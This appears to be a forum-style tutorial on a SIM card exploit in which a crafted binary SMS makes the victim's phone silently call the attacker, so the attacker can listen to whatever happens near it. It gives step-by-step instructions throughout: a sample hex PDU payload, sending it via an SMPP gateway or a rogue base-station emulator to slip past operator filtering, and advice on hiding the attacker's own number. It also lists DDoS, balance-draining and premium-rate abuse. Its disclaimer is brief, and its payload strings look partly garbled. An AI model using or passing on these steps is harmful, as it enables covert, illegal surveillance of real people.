Mobile operators naturally filter such SMS messages. Therefore, we send them through our own base station emulator In short, we put the subscriber on our BS, send him a magic SMS and immediately turn off the BS emulator. The subscriber again selects the "legal" public network, and the command to set up the connection is carried out through the regular operator.
a way to force the victim's phone to dial the number needed by the "information security researcher" on their own. The hacker can then "pick up the phone" and eavesdrop on everything that happens near the target.
the hacker sends a binary SMS to the target's phone. The SMS contains a special payload executed by the operating system of the phone's SIM card, which initiates an outgoing call through the "S@t setup call" mechanism. In most phones, the subscriber's participation is not required, external signs are a short-term inclusion of the display backlight. Some phones display "Confirm connection?" when the subscriber presses "yes", the screen goes blank and an outgoing call is made. The hacker "answers the phone" on his phone and then can eavesdrop on everything that happens near the victim's phone. Duration of listening - depends on the settings of the telecommunications operator (duration of an open voice session) and is usually 1 hour. Then you need to resend the SMS.
FIRST STEP
For first you must put your phone number in Hexadecimal PDU Message for example: "0x042230121020744382E3130353105160604313035312D0C100383060791 2143658709F0 2B00"
http://rednaxela.net/pdu.php
Now you need to sent by the SMPP gateway example: "82E3130353105160604313035312D0C100383060791 2143658709F0 2B00 first 2143658709F 0"
- destination phone
the second, at the end of the message 2143658709F0 - the hacker's phone
Here you can check the received package - https://www.smsdeliverer.com/online-sms-pdu-decoder.aspx
Explenation
Mobile operators naturally filter such SMS messages. Therefore, we send them through our own base station emulator In short, we put the subscriber on our BS, send him a magic SMS and immediately turn off the BS emulator. The subscriber again selects the "legal" public network, and the command to set up the connection is carried out through the regular operator.
don't replace your "clean" numbers with the apdu command, because these outgoing calls are recorded by the operator and the number will be highlighted.
Exploit is not 100 percent, It does not work on all phones and SIM cards, some smartphones display a message asking you to confirm the connection - but the thing is cool and recommended to master at least to understand the possible attack vectors on the phone.
- Attacker can eavesdropping on what is happening near the phone without the subscriber's knowledge
- Attacker can mass long-term distribution of such SMS apdus for a DDOS attack on a specific phone
- Attacker can leaving the subscriber without communication by calling the roaming number and using his balance
- Attacker can create a paid, substantial phone number and initiate calls to it - I'm not sure thats scheme works now
please consider this as an informative tutorial, and only test it in your own environment or with the permission of 2 people. Eavesdropping on a person without his or her knowledge is illegal, and especially highly not moral.